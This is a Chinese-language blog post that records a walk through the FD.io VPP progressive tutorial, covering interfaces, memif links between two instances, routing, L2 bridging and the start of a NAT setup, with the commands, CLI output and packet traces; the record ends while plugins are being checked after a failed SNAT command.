Kun_Tsai
Kun_Tsai

VPP基本操作练习

目录

基本操作

启动

输入命令到vpp1

开启vpp shell

接口操作

创建veth

创建vpp接口

设置vpp接口IP

Trace数据包

连接两个VPP实例

查看ARP

查看VPP路由表

启动第二个VPP实例

创建memif

路由操作

添加主机路由

添加vpp2路由

Trace Ping

SWITCHING

重新启动两个VPP实例

建立veth为vpp1

建立veth为vpp2

vpp1建桥

vpp2创建loopback口

vpp2建桥

Trace数据包

检查l2 fib

NAT

创建veth

添加网络域名

配置VPP1 SNAT

检查插件

VPP配置NAT

测试NAT

根据https://wiki.fd.io/view/VPP/Progressive_VPP_Tutorial官方的教程操作一遍的记录

操作内容包括启动多个vpp实例,创建配置接口,memif通信,路由,交换,NAT。

基本操作

启动

sudo vpp unix {cli-listen /run/vpp/cli-vpp1.sock} api-segment { prefix vpp1 }

参数说明
prefix vpp1, 实例名,命令两个文件

[ckun@localhost ~]$ cd /dev/shm/
[ckun@localhost shm]$ ls
vpp1-global_vm  vpp1-vpe-api

cli-listen /run/vpp/cli-vpp1.sock
vppctl用非默认socket文件连接该实例

[ckun@localhost shm]$ cd /run/vpp
[ckun@localhost vpp]$ ls
cli-vpp1.sock

输入命令到vpp1

[ckun@localhost vpp_plugins]$ sudo vppctl -s /run/vpp/cli-vpp1.sock show ver 
vpp v18.10-13~g00adccea built by vincent on centos at Wed Nov 28 15:53:26 CST 2018

开启vpp shell

vppctrl开启一个vpp shell
[ckun@localhost pkgs]$ sudo vppctl -s /run/vpp/cli-vpp1.sock 
    _______    _        _   _____  ___ 
 __/ __/ _ \  (_)__    | | / / _ \/ _ \
 _/ _// // / / / _ \   | |/ / ___/ ___/
 /_/ /____(_)_/\___/   |___/_/  /_/    

vpp# quit
[ckun@localhost pkgs]$

接口操作

创建veth

ckun@localhost pkgs]$ sudo ip link add name vpp1out type veth peer name vpp1host
[sudo] password for ckun: 
[ckun@localhost pkgs]$ 
[ckun@localhost pkgs]$ ip addr show vpp1host
6: vpp1host@vpp1out:  mtu 1500 qdisc noop state DOWN group default qlen 1000
    link/ether 0e:cb:49:6b:ac:ec brd ff:ff:ff:ff:ff:ff
[ckun@localhost pkgs]$ 

[ckun@localhost pkgs]$ sudo ip link set dev vpp1out up
[ckun@localhost pkgs]$ sudo ip link set dev vpp1host up
[ckun@localhost pkgs]$ sudo ip addr add 66.6.6.6/24 dev vpp1host
[ckun@localhost pkgs]$ sudo ip addr show vpp1host
6: vpp1host@vpp1out:  mtu 1500 qdisc noqueue state UP group default qlen 1000
    link/ether 0e:cb:49:6b:ac:ec brd ff:ff:ff:ff:ff:ff
    inet 66.6.6.6/24 scope global vpp1host
       valid_lft forever preferred_lft forever
    inet6 fe80::ccb:49ff:fe6b:acec/64 scope link 
       valid_lft forever preferred_lft forever

创建vpp接口

关联到veth

[ckun@localhost pkgs]$ sudo vppctl -s /run/vpp/cli-vpp1.sock create host-interface name vpp1out
[sudo] password for ckun: 
host-vpp1out
[ckun@localhost pkgs]$ sudo vppctl -s /run/vpp/cli-vpp1.sock show hardware
              Name                Idx   Link  Hardware
host-vpp1out                       1     up   host-vpp1out
  Ethernet address 02:fe:e3:84:cc:fd
  Linux PACKET socket interface
local0                             0    down  local0
  local

设置vpp接口IP

[ckun@localhost pkgs]$ sudo vppctl -s /run/vpp/cli-vpp1.sock set state host-vpp1out up
set: unknown input `state host-vpp1out up'
[ckun@localhost pkgs]$ sudo vppctl -s /run/vpp/cli-vpp1.sock set int state host-vpp1out up
[ckun@localhost pkgs]$ sudo vppctl -s /run/vpp/cli-vpp1.sock set int ip address host-vpp1out 66.6.6.7/24
[ckun@localhost pkgs]$ sudo vppctl -s /run/vpp/cli-vpp1.sock show int
              Name               Idx    State  MTU (L3/IP4/IP6/MPLS)     Counter          Count     
host-vpp1out                      1      up          9000/0/0/0     
local0                            0     down          0/0/0/0       
[ckun@localhost pkgs]$ sudo vppctl -s /run/vpp/cli-vpp1.sock show int address
host-vpp1out (up):
  L3 66.6.6.7/24

Trace数据包

[ckun@localhost pkgs]$ sudo vppctl -s /run/vpp/cli-vpp1.sock trace add af-packet-input 10
[ckun@localhost pkgs]$ 
[ckun@localhost pkgs]$ ping -c 1 66.6.6.7
PING 66.6.6.7 (66.6.6.7) 56(84) bytes of data.
64 bytes from 66.6.6.7: icmp_seq=1 ttl=64 time=0.586 ms

--- 66.6.6.7 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.586/0.586/0.586/0.000 ms
[ckun@localhost pkgs]$ sudo vppctl -s /run/vpp/cli-vpp1.sock show trace
------------------- Start of thread 0 vpp_main -------------------
Packet 1

01:40:31:378778: af-packet-input
  af_packet: hw_if_index 1 next-index 4
    tpacket2_hdr:
      status 0x20000001 len 98 snaplen 98 mac 66 net 80
      sec 0x5bff6929 nsec 0x2d87130 vlan 0 vlan_tpid 0
01:40:31:378794: ethernet-input
  IP4: 0e:cb:49:6b:ac:ec -> 02:fe:e3:84:cc:fd
01:40:31:378803: ip4-input
  ICMP: 66.6.6.6 -> 66.6.6.7
    tos 0x00, ttl 64, length 84, checksum 0x9b12
    fragment id 0x0f7e, flags DONT_FRAGMENT
  ICMP echo_request checksum 0x8ef0
01:40:31:378806: ip4-lookup
  fib 0 dpo-idx 5 flow hash: 0x00000000
  ICMP: 66.6.6.6 -> 66.6.6.7
    tos 0x00, ttl 64, length 84, checksum 0x9b12
    fragment id 0x0f7e, flags DONT_FRAGMENT
  ICMP echo_request checksum 0x8ef0
01:40:31:378813: ip4-local
    ICMP: 66.6.6.6 -> 66.6.6.7
      tos 0x00, ttl 64, length 84, checksum 0x9b12
      fragment id 0x0f7e, flags DONT_FRAGMENT
    ICMP echo_request checksum 0x8ef0
01:40:31:378814: ip4-icmp-input
  ICMP: 66.6.6.6 -> 66.6.6.7
    tos 0x00, ttl 64, length 84, checksum 0x9b12
    fragment id 0x0f7e, flags DONT_FRAGMENT
  ICMP echo_request checksum 0x8ef0
01:40:31:378816: ip4-icmp-echo-request
  ICMP: 66.6.6.6 -> 66.6.6.7
    tos 0x00, ttl 64, length 84, checksum 0x9b12
    fragment id 0x0f7e, flags DONT_FRAGMENT
  ICMP echo_request checksum 0x8ef0
01:40:31:378817: ip4-load-balance
  fib 0 dpo-idx 13 flow hash: 0x00000000
  ICMP: 66.6.6.7 -> 66.6.6.6
    tos 0x00, ttl 64, length 84, checksum 0xe0dd
    fragment id 0xc9b2, flags DONT_FRAGMENT
  ICMP echo_reply checksum 0x96f0
01:40:31:378819: ip4-rewrite
  tx_sw_if_index 1 dpo-idx 1 : ipv4 via 66.6.6.6 host-vpp1out: mtu:9000 0ecb496bacec02fee384ccfd0800 flow hash: 0x00000000
  00000000: 0ecb496bacec02fee384ccfd080045000054c9b240004001e0dd420606074206
  00000020: 0606000096f021bc00012969ff5b000000005fba0000000000001011
01:40:31:378821: host-vpp1out-output
  host-vpp1out
  IP4: 02:fe:e3:84:cc:fd -> 0e:cb:49:6b:ac:ec
  ICMP: 66.6.6.7 -> 66.6.6.6
    tos 0x00, ttl 64, length 84, checksum 0xe0dd
    fragment id 0xc9b2, flags DONT_FRAGMENT
  ICMP echo_reply checksum 0x96f0

sudo vppctl -s /run/vpp/cli-vpp1.sock clear trace

连接两个VPP实例

查看ARP

[ckun@localhost pkgs]$ sudo vppctl -s /run/vpp/cli-vpp1.sock show ip arp
    Time           IP4       Flags      Ethernet              Interface       
  12853.6336    66.6.6.6       D    0e:cb:49:6b:ac:ec host-vpp1out

查看VPP路由表

[ckun@localhost pkgs]$ sudo vppctl -s /run/vpp/cli-vpp1.sock show ip fib
ipv4-VRF:0, fib_index:0, flow hash:[src dst sport dport proto ] locks:[src:plugin-hi:2, src:adjacency:1, src:default-route:1, ]
0.0.0.0/0
  unicast-ip4-chain
  [@0]: dpo-load-balance: [proto:ip4 index:1 buckets:1 uRPF:0 to:[0:0]]
    [0] [@0]: dpo-drop ip4
0.0.0.0/32
  unicast-ip4-chain
  [@0]: dpo-load-balance: [proto:ip4 index:2 buckets:1 uRPF:1 to:[0:0]]
    [0] [@0]: dpo-drop ip4
66.6.6.0/32
  unicast-ip4-chain
  [@0]: dpo-load-balance: [proto:ip4 index:10 buckets:1 uRPF:9 to:[0:0]]
    [0] [@0]: dpo-drop ip4
66.6.6.6/32
  unicast-ip4-chain
  [@0]: dpo-load-balance: [proto:ip4 index:13 buckets:1 uRPF:12 to:[21:1764] via:[4:336]]
    [0] [@5]: ipv4 via 66.6.6.6 host-vpp1out: mtu:9000 0ecb496bacec02fee384ccfd0800
66.6.6.0/24
  unicast-ip4-chain
  [@0]: dpo-load-balance: [proto:ip4 index:9 buckets:1 uRPF:8 to:[0:0]]
    [0] [@4]: ipv4-glean: host-vpp1out: mtu:9000 ffffffffffff02fee384ccfd0806
66.6.6.7/32
  unicast-ip4-chain
  [@0]: dpo-load-balance: [proto:ip4 index:12 buckets:1 uRPF:13 to:[25:2100]]
    [0] [@2]: dpo-receive: 66.6.6.7 on host-vpp1out
66.6.6.255/32
  unicast-ip4-chain
  [@0]: dpo-load-balance: [proto:ip4 index:11 buckets:1 uRPF:11 to:[0:0]]
    [0] [@0]: dpo-drop ip4
224.0.0.0/4
  unicast-ip4-chain
  [@0]: dpo-load-balance: [proto:ip4 index:4 buckets:1 uRPF:3 to:[0:0]]
    [0] [@0]: dpo-drop ip4
240.0.0.0/4
  unicast-ip4-chain
  [@0]: dpo-load-balance: [proto:ip4 index:3 buckets:1 uRPF:2 to:[0:0]]
    [0] [@0]: dpo-drop ip4
255.255.255.255/32
  unicast-ip4-chain
  [@0]: dpo-load-balance: [proto:ip4 index:5 buckets:1 uRPF:4 to:[0:0]]
    [0] [@0]: dpo-drop ip4

启动第二个VPP实例

sudo vpp unix {cli-listen /run/vpp/cli-vpp2.sock} api-segment { prefix vpp2 }

创建memif

sudo vppctl -s /run/vpp/cli-vpp1.sock create interface memif id 0 master
[ckun@localhost pkgs]$ sudo vppctl -s /run/vpp/cli-vpp1.sock create interface memif id 0 master 
[ckun@localhost pkgs]$ sudo vppctl -s /run/vpp/cli-vpp2.sock create interface memif id 0 slave
[ckun@localhost pkgs]$ sudo vppctl -s /run/vpp/cli-vpp1.sock set int state memif0/0 up
[ckun@localhost pkgs]$ sudo vppctl -s /run/vpp/cli-vpp1.sock set int ip address memif0/0 66.6.2.1/24
[ckun@localhost pkgs]$ sudo vppctl -s /run/vpp/cli-vpp1.sock show int
              Name               Idx    State  MTU (L3/IP4/IP6/MPLS)     Counter          Count     
host-vpp1out                      1      up          9000/0/0/0     rx packets                    32
                                                                    rx bytes                    2744
                                                                    tx packets                    32
                                                                    tx bytes                    2744
                                                                    drops                         21
                                                                    ip4                           25
local0                            0     down          0/0/0/0       
memif0/0                          2      up          9000/0/0/0     
[ckun@localhost pkgs]$ sudo vppctl -s /run/vpp/cli-vpp1.sock show int address
host-vpp1out (up):
  L3 66.6.6.7/24
local0 (dn):
memif0/0 (up):
  L3 66.6.2.1/24
 
[ckun@localhost pkgs]$ sudo vppctl -s /run/vpp/cli-vpp2.sock set int state memif0/0 up
[ckun@localhost pkgs]$ sudo vppctl -s /run/vpp/cli-vpp2.sock set int ip address memif0/0 66.6.2.2/24
[ckun@localhost pkgs]$ sudo vppctl -s /run/vpp/cli-vpp2.sock show int
              Name               Idx    State  MTU (L3/IP4/IP6/MPLS)     Counter          Count     
local0                            0     down          0/0/0/0       
memif0/0                          1      up          9000/0/0/0     
[ckun@localhost pkgs]$ 
[ckun@localhost pkgs]$ sudo vppctl -s /run/vpp/cli-vpp2.sock show int addr
local0 (dn):
memif0/0 (up):
  L3 66.6.2.2/24

路由操作

添加主机路由

去66.6.2.0/24网段,得经过66.6.6.7(vpp1)的网关

[ckun@localhost pkgs]$ sudo ip route add 66.6.2.0/24 via 66.6.6.7

添加vpp2路由

[ckun@localhost pkgs]$ sudo vppctl -s /run/vpp/cli-vpp2.sock ip route add 66.6.6.0/24 via 66.6.2.1

Trace Ping

[ckun@localhost pkgs]$ sudo vppctl -s /run/vpp/cli-vpp1.sock clear trace
[ckun@localhost pkgs]$ sudo vppctl -s /run/vpp/cli-vpp2.sock clear trace
[ckun@localhost pkgs]$ sudo vppctl -s /run/vpp/cli-vpp1.sock trace add af-packet-input 10
[ckun@localhost pkgs]$ sudo vppctl -s /run/vpp/cli-vpp1.sock trace add memif-input 10
[ckun@localhost pkgs]$ sudo vppctl -s /run/vpp/cli-vpp2.sock trace add memif-input 10
ping vpp2的66.6.2.2
[ckun@localhost pkgs]$ ping -c 1 66.6.2.2
PING 66.6.2.2 (66.6.2.2) 56(84) bytes of data.
64 bytes from 66.6.2.2: icmp_seq=1 ttl=63 time=32.3 ms

--- 66.6.2.2 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 32.306/32.306/32.306/0.000 ms

Trace vpp1
[ckun@localhost pkgs]$ sudo vppctl -s /run/vpp/cli-vpp1.sock show trace
------------------- Start of thread 0 vpp_main -------------------
Packet 1

06:32:31:320642: af-packet-input
  af_packet: hw_if_index 1 next-index 4
    tpacket2_hdr:
      status 0x20000001 len 98 snaplen 98 mac 66 net 80
      sec 0x5bffada8 nsec 0x33382c28 vlan 0 vlan_tpid 0
06:32:31:320646: ethernet-input
  IP4: 0e:cb:49:6b:ac:ec -> 02:fe:e3:84:cc:fd
06:32:31:320649: ip4-input
  ICMP: 66.6.6.6 -> 66.6.2.2
    tos 0x00, ttl 64, length 84, checksum 0xb482
    fragment id 0xfa12, flags DONT_FRAGMENT
  ICMP echo_request checksum 0xb2aa
06:32:31:320651: ip4-lookup
  fib 0 dpo-idx 3 flow hash: 0x00000000
  ICMP: 66.6.6.6 -> 66.6.2.2
    tos 0x00, ttl 64, length 84, checksum 0xb482
    fragment id 0xfa12, flags DONT_FRAGMENT
  ICMP echo_request checksum 0xb2aa
06:32:31:320653: ip4-rewrite
  tx_sw_if_index 2 dpo-idx 3 : ipv4 via 66.6.2.2 memif0/0: mtu:9000 02fe41ed93e802feed6375990800 flow hash: 0x00000000
  00000000: 02fe41ed93e802feed637599080045000054fa1240003f01b582420606064206
  00000020: 02020800b2aa2e5b0001a8adff5b00000000a31c0d00000000001011
06:32:31:320655: memif0/0-output
  memif0/0
  IP4: 02:fe:ed:63:75:99 -> 02:fe:41:ed:93:e8
  ICMP: 66.6.6.6 -> 66.6.2.2
    tos 0x00, ttl 63, length 84, checksum 0xb582
    fragment id 0xfa12, flags DONT_FRAGMENT
  ICMP echo_request checksum 0xb2aa

Packet 2

06:32:31:331352: memif-input
  memif: hw_if_index 2 next-index 4
    slot: ring 0

Trace vpp2

[ckun@localhost vpp]$ sudo vppctl -s /run/vpp/cli-vpp2.sock show trace
[sudo] password for ckun: 
------------------- Start of thread 0 vpp_main -------------------
Packet 1

02:48:16:790140: memif-input
  memif: hw_if_index 1 next-index 4
    slot: ring 0
02:48:16:790145: ethernet-input
  IP4: 02:fe:ed:63:75:99 -> 02:fe:41:ed:93:e8
02:48:16:790148: ip4-input
  ICMP: 66.6.6.6 -> 66.6.2.2
    tos 0x00, ttl 63, length 84, checksum 0xb582
    fragment id 0xfa12, flags DONT_FRAGMENT
  ICMP echo_request checksum 0xb2aa
02:48:16:790151: ip4-lookup
  fib 0 dpo-idx 5 flow hash: 0x00000000
  ICMP: 66.6.6.6 -> 66.6.2.2
    tos 0x00, ttl 63, length 84, checksum 0xb582
    fragment id 0xfa12, flags DONT_FRAGMENT
  ICMP echo_request checksum 0xb2aa
02:48:16:790154: ip4-local
    ICMP: 66.6.6.6 -> 66.6.2.2
      tos 0x00, ttl 63, length 84, checksum 0xb582
      fragment id 0xfa12, flags DONT_FRAGMENT
    ICMP echo_request checksum 0xb2aa
02:48:16:790155: ip4-icmp-input
  ICMP: 66.6.6.6 -> 66.6.2.2
    tos 0x00, ttl 63, length 84, checksum 0xb582
    fragment id 0xfa12, flags DONT_FRAGMENT
  ICMP echo_request checksum 0xb2aa
02:48:16:790156: ip4-icmp-echo-request
  ICMP: 66.6.6.6 -> 66.6.2.2
    tos 0x00, ttl 63, length 84, checksum 0xb582
    fragment id 0xfa12, flags DONT_FRAGMENT
  ICMP echo_request checksum 0xb2aa
02:48:16:790158: ip4-load-balance
  fib 0 dpo-idx 14 flow hash: 0x00000000
  ICMP: 66.6.2.2 -> 66.6.6.6
    tos 0x00, ttl 64, length 84, checksum 0x88b5
    fragment id 0x25e0, flags DONT_FRAGMENT
  ICMP echo_reply checksum 0xbaaa
  fib 0 dpo-idx 13 flow hash: 0x00000000
  ICMP: 66.6.2.2 -> 66.6.6.6
    tos 0x00, ttl 64, length 84, checksum 0x88b5
    fragment id 0x25e0, flags DONT_FRAGMENT
  ICMP echo_reply checksum 0xbaaa
02:48:16:790160: ip4-rewrite
  tx_sw_if_index 1 dpo-idx 1 : ipv4 via 66.6.2.1 memif0/0: mtu:9000 02feed63759902fe41ed93e80800 flow hash: 0x00000000
  00000000: 02feed63759902fe41ed93e808004500005425e04000400188b5420602024206
  00000020: 06060000baaa2e5b0001a8adff5b00000000a31c0d00000000001011
02:48:16:790161: memif0/0-output
  memif0/0
  IP4: 02:fe:41:ed:93:e8 -> 02:fe:ed:63:75:99
  ICMP: 66.6.2.2 -> 66.6.6.6
    tos 0x00, ttl 64, length 84, checksum 0x88b5
    fragment id 0x25e0, flags DONT_FRAGMENT
  ICMP echo_reply checksum 0xbaaa

SWITCHING

先reboot或者杀掉vpp进程,清除veth。

重新启动两个VPP实例

sudo vpp unix {cli-listen /run/vpp/cli-vpp1.sock} api-segment { prefix vpp1 }
sudo vpp unix {cli-listen /run/vpp/cli-vpp2.sock} api-segment { prefix vpp2 }

建立veth为vpp1

sudo ip link add name vpp1host type veth peer name vpp1out
sudo ip link set dev vpp1host up
sudo ip link set dev vpp1out up
sudo ip addr add 66.6.1.1/24 dev vpp1host
sudo vppctl -s /run/vpp/cli-vpp1.sock create host-interface name vpp1out
sudo vppctl -s /run/vpp/cli-vpp1.sock show int
sudo vppctl -s /run/vpp/cli-vpp1.sock set int state host-vpp1out up
sudo vppctl -s /run/vpp/cli-vpp1.sock show int addr

建立veth为vpp2

sudo ip link add name vpp1vpp2 type veth peer name vpp2vpp1
sudo ip link set dev vpp1vpp2 up
sudo ip link set dev vpp2vpp1 up

sudo vppctl -s /run/vpp/cli-vpp1.sock create host-interface name vpp1vpp2
sudo vppctl -s /run/vpp/cli-vpp1.sock set int state host-vpp1vpp2 up

sudo vppctl -s /run/vpp/cli-vpp2.sock create host-interface name vpp2vpp1
sudo vppctl -s /run/vpp/cli-vpp2.sock set int state host-vpp2vpp1 up

[ckun@localhost ~]$ sudo vppctl -s /run/vpp/cli-vpp2.sock show int
              Name               Idx    State  MTU (L3/IP4/IP6/MPLS)     Counter          Count     
host-vpp2vpp1                     1      up          9000/0/0/0     
local0                            0     down          0/0/0/0       
[ckun@localhost ~]$ 
[ckun@localhost ~]$ 
[ckun@localhost ~]$ sudo vppctl -s /run/vpp/cli-vpp1.sock show int
              Name               Idx    State  MTU (L3/IP4/IP6/MPLS)     Counter          Count     
host-vpp1out                      1      up          9000/0/0/0     rx packets                    29
                                                                    rx bytes                    4177
                                                                    drops                         29
                                                                    ip4                           15
                                                                    ip6                           14
host-vpp1vpp2                     2      up          9000/0/0/0     
local0                            0     down          0/0/0/0

vpp1建桥

[ckun@localhost ~]$ sudo vppctl -s /run/vpp/cli-vpp1.sock set int l2 bridge host-vpp1out 1
[ckun@localhost ~]$ sudo vppctl -s /run/vpp/cli-vpp1.sock set int l2 bridge host-vpp1vpp2  1
[ckun@localhost ~]$ sudo vppctl -s /run/vpp/cli-vpp1.sock show bridge-domain
  BD-ID   Index   BSN  Age(min)  Learning  U-Forwrd   UU-Flood   Flooding  ARP-Term   BVI-Intf 
    1       1      0     off        on        on       flood        on       off        N/A    
[ckun@localhost ~]$ 
[ckun@localhost ~]$ sudo vppctl -s /run/vpp/cli-vpp1.sock show bridge-domain 1 detail
  BD-ID   Index   BSN  Age(min)  Learning  U-Forwrd   UU-Flood   Flooding  ARP-Term   BVI-Intf 
    1       1      0     off        on        on       flood        on       off        N/A    

           Interface           If-idx ISN  SHG  BVI  TxFlood        VLAN-Tag-Rewrite       
         host-vpp1out            1     3    0    -      *                 none             
         host-vpp1vpp2           2     3    0    -      *                 none

vpp2创建loopback口

[ckun@localhost ~]$ sudo vppctl -s /run/vpp/cli-vpp2.sock create loopback interface
loop0
[ckun@localhost ~]$ sudo vppctl -s /run/vpp/cli-vpp2.sock set int state loop0 up
[ckun@localhost ~]$ sudo vppctl -s /run/vpp/cli-vpp2.sock set int ip address loop0 66.6.1.2/24

vpp2建桥

sudo vppctl -s /run/vpp/cli-vpp2.sock set int l2 bridge loop0 1 bvi
sudo vppctl -s /run/vpp/cli-vpp2.sock set int l2 bridge host-vpp2vpp1 1
[ckun@localhost ~]$ sudo vppctl -s /run/vpp/cli-vpp2.sock show bridge-domain 1 detail
  BD-ID   Index   BSN  Age(min)  Learning  U-Forwrd   UU-Flood   Flooding  ARP-Term   BVI-Intf 
    1       1      0     off        on        on       flood        on       off       loop0   

           Interface           If-idx ISN  SHG  BVI  TxFlood        VLAN-Tag-Rewrite       
             loop0               2     1    0    *      *                 none             
         host-vpp2vpp1           1     1    0    -      *                 none

Trace数据包

[ckun@localhost ~]$ sudo vppctl -s /run/vpp/cli-vpp1.sock trace add af-packet-input 10
[ckun@localhost ~]$ sudo vppctl -s /run/vpp/cli-vpp2.sock trace add af-packet-input 10
[ckun@localhost ~]$ sudo vppctl -s /run/vpp/cli-vpp2.sock  ping 66.6.1.1
64 bytes from 66.6.1.1: icmp_seq=1 ttl=64 time=10.4932 ms
^C
[ckun@localhost ~]$ sudo vppctl -s /run/vpp/cli-vpp2.sock show trace
------------------- Start of thread 0 vpp_main -------------------
Packet 1

00:47:31:078594: af-packet-input
  af_packet: hw_if_index 1 next-index 4
    tpacket2_hdr:
      status 0x1 len 98 snaplen 98 mac 66 net 80
      sec 0x5c00a570 nsec 0x1985de22 vlan 0 vlan_tpid 0
00:47:31:078597: ethernet-input
  IP4: 5a:ee:dd:35:b9:81 -> de:ad:00:00:00:00
00:47:31:078599: l2-input
  l2-input: sw_if_index 1 dst de:ad:00:00:00:00 src 5a:ee:dd:35:b9:81
00:47:31:078600: l2-learn
  l2-learn: sw_if_index 1 dst de:ad:00:00:00:00 src 5a:ee:dd:35:b9:81 bd_index 1
00:47:31:078601: l2-fwd
  l2-fwd:   sw_if_index 1 dst de:ad:00:00:00:00 src 5a:ee:dd:35:b9:81 bd_index 1
00:47:31:078602: ip4-input
  ICMP: 66.6.1.1 -> 66.6.1.2
    tos 0x00, ttl 64, length 84, checksum 0x4588
    fragment id 0xaf12
  ICMP echo_reply checksum 0xe145
00:47:31:078603: ip4-lookup
  fib 0 dpo-idx 5 flow hash: 0x00000000
  ICMP: 66.6.1.1 -> 66.6.1.2
    tos 0x00, ttl 64, length 84, checksum 0x4588
    fragment id 0xaf12
  ICMP echo_reply checksum 0xe145
00:47:31:078604: ip4-local
    ICMP: 66.6.1.1 -> 66.6.1.2
      tos 0x00, ttl 64, length 84, checksum 0x4588
      fragment id 0xaf12
    ICMP echo_reply checksum 0xe145
00:47:31:078605: ip4-icmp-input
  ICMP: 66.6.1.1 -> 66.6.1.2
    tos 0x00, ttl 64, length 84, checksum 0x4588
    fragment id 0xaf12
  ICMP echo_reply checksum 0xe145
00:47:31:078606: ip4-icmp-echo-reply
  ICMP echo id 59385 seq 1
00:47:31:078609: ip4-drop
    ICMP: 66.6.1.1 -> 66.6.1.2
      tos 0x00, ttl 64, length 84, checksum 0x4588
      fragment id 0xaf12
    ICMP echo_reply checksum 0xe145
00:47:31:078609: error-drop
  ip4-icmp-input: unknown type

[ckun@localhost ~]$ sudo vppctl -s /run/vpp/cli-vpp1.sock show trace
------------------- Start of thread 0 vpp_main -------------------
Packet 1

00:47:32:458501: af-packet-input
  af_packet: hw_if_index 2 next-index 4
    tpacket2_hdr:
      status 0x1 len 98 snaplen 98 mac 66 net 80
      sec 0x5c00a570 nsec 0x19849fbf vlan 0 vlan_tpid 0
00:47:32:458505: ethernet-input
  IP4: de:ad:00:00:00:00 -> 5a:ee:dd:35:b9:81
00:47:32:458507: l2-input
  l2-input: sw_if_index 2 dst 5a:ee:dd:35:b9:81 src de:ad:00:00:00:00
00:47:32:458509: l2-learn
  l2-learn: sw_if_index 2 dst 5a:ee:dd:35:b9:81 src de:ad:00:00:00:00 bd_index 1
00:47:32:458511: l2-fwd
  l2-fwd:   sw_if_index 2 dst 5a:ee:dd:35:b9:81 src de:ad:00:00:00:00 bd_index 1
00:47:32:458512: l2-output
  l2-output: sw_if_index 1 dst 5a:ee:dd:35:b9:81 src de:ad:00:00:00:00 data 08 00 45 00 00 54 00 00 00 00 fe 01
00:47:32:458513: host-vpp1out-output
  host-vpp1out
  IP4: de:ad:00:00:00:00 -> 5a:ee:dd:35:b9:81
  ICMP: 66.6.1.2 -> 66.6.1.1
    tos 0x00, ttl 254, length 84, checksum 0x369a
    fragment id 0x0000
  ICMP echo_request checksum 0xd945

Packet 2

00:47:32:458553: af-packet-input
  af_packet: hw_if_index 1 next-index 4
    tpacket2_hdr:
      status 0x1 len 98 snaplen 98 mac 66 net 80
      sec 0x5c00a570 nsec 0x1985b56f vlan 0 vlan_tpid 0
00:47:32:458554: ethernet-input
  IP4: 5a:ee:dd:35:b9:81 -> de:ad:00:00:00:00
00:47:32:458555: l2-input
  l2-input: sw_if_index 1 dst de:ad:00:00:00:00 src 5a:ee:dd:35:b9:81
00:47:32:458555: l2-learn
  l2-learn: sw_if_index 1 dst de:ad:00:00:00:00 src 5a:ee:dd:35:b9:81 bd_index 1
00:47:32:458555: l2-fwd
  l2-fwd:   sw_if_index 1 dst de:ad:00:00:00:00 src 5a:ee:dd:35:b9:81 bd_index 1
00:47:32:458556: l2-output
  l2-output: sw_if_index 2 dst de:ad:00:00:00:00 src 5a:ee:dd:35:b9:81 data 08 00 45 00 00 54 af 12 00 00 40 01
00:47:32:458556: host-vpp1vpp2-output
  host-vpp1vpp2
  IP4: 5a:ee:dd:35:b9:81 -> de:ad:00:00:00:00
  ICMP: 66.6.1.1 -> 66.6.1.2
    tos 0x00, ttl 64, length 84, checksum 0x4588
    fragment id 0xaf12
  ICMP echo_reply checksum 0xe145

检查l2 fib

[ckun@localhost ~]$ sudo vppctl -s /run/vpp/cli-vpp1.sock show l2fib verbose
    Mac-Address     BD-Idx If-Idx BSN-ISN Age(min) static filter bvi         Interface-Name        
 de:ad:00:00:00:00    1      2      0/3      -       -      -     -           host-vpp1vpp2        
 5a:ee:dd:35:b9:81    1      1      0/3      -       -      -     -           host-vpp1out         
L2FIB total/learned entries: 2/2  Last scan time: 6.0619e-4sec  Learn limit: 4194304 
[ckun@localhost ~]$ sudo vppctl -s /run/vpp/cli-vpp2.sock show l2fib verbose
    Mac-Address     BD-Idx If-Idx BSN-ISN Age(min) static filter bvi         Interface-Name        
 de:ad:00:00:00:00    1      2      0/0      no      *      -     *               loop0            
 5a:ee:dd:35:b9:81    1      1      0/1      -       -      -     -           host-vpp2vpp1        
L2FIB total/learned entries: 2/1  Last scan time: 0.0000e0sec  Learn limit: 4194304

NAT

清除配置,重启一个VPP1实例

创建veth

[ckun@localhost pkgs]$ sudo ip link add name vpp1outside type veth peer name vpp1outsidehost
[sudo] password for ckun: 
[ckun@localhost pkgs]$ 
[ckun@localhost pkgs]$ 
[ckun@localhost pkgs]$ sudo ip addr add 66.6.1.1/24 dev vpp1outsidehost
[ckun@localhost pkgs]$ 
[ckun@localhost pkgs]$ sudo ip link add name vpp1inside type veth peer name vpp1insidehost
[ckun@localhost pkgs]$ sudo ip addr add 66.6.2.1/24 dev vpp1insidehost
[ckun@localhost pkgs]$ 
[ckun@localhost pkgs]$ sudo ip link set dev vpp1outsidehost up
[ckun@localhost pkgs]$ sudo ip link set dev vpp1insidehost up
[ckun@localhost pkgs]$ sudo vppctl -s /run/vpp/cli-vpp1.sock set int ip address host-vpp1outside 66.6.1.2/24
[ckun@localhost pkgs]$ sudo vppctl -s /run/vpp/cli-vpp1.sock set int ip address host-vpp1inside 66.6.2.2/24
[ckun@localhost pkgs]$ 
[ckun@localhost pkgs]$ sudo vppctl -s /run/vpp/cli-vpp1.sock set int state host-vpp1outside up
[ckun@localhost pkgs]$ sudo vppctl -s /run/vpp/cli-vpp1.sock set int state host-vpp1inside up

添加网络域名

[ckun@localhost pkgs]$ sudo ip netns add inside
[ckun@localhost pkgs]$ 
[ckun@localhost pkgs]$ sudo ip link set dev vpp1insidehost up netns inside
[ckun@localhost pkgs]$ sudo ip netns exec inside ip addr add 66.6.2.1/24 dev vpp1insidehost
[ckun@localhost pkgs]$ sudo ip netns exec inside ip route add 66.6.1.0/24 via 66.6.2.2

配置VPP1 SNAT

[ckun@localhost pkgs]$ sudo vppctl -s /run/vpp/cli-vpp1.sock snat add interface address host-vpp1outside
unknown input `snat add interface address hos...'

检查插件

[ckun@localhost pkgs]$ sudo vppctl -s /run/vpp/cli-vpp1.sock show plugin
 Plugin path is: /usr/lib/vpp_plugins

     Plugin                                   Version                          Description
  1. ioam_plugin.so                           18.10-13~g00adccea               Inbound OAM
  2. memif_plugin.so                          18.10-13~g00adccea               Packet Memory Interface (experimental)
  3. nsh_plugin.so                            18.10-13~g00adccea               Network Service Header
  4. avf_plugin.so                            18.10-13~g00adccea               Intel Adaptive Virtual Function (AVF) Device Plugin
  5. pppoe_plugin.so                          18.10-13~g00adccea               PPPoE
  6. abf_plugin.so                            18.10-13~g00adccea               ACL based Forwarding
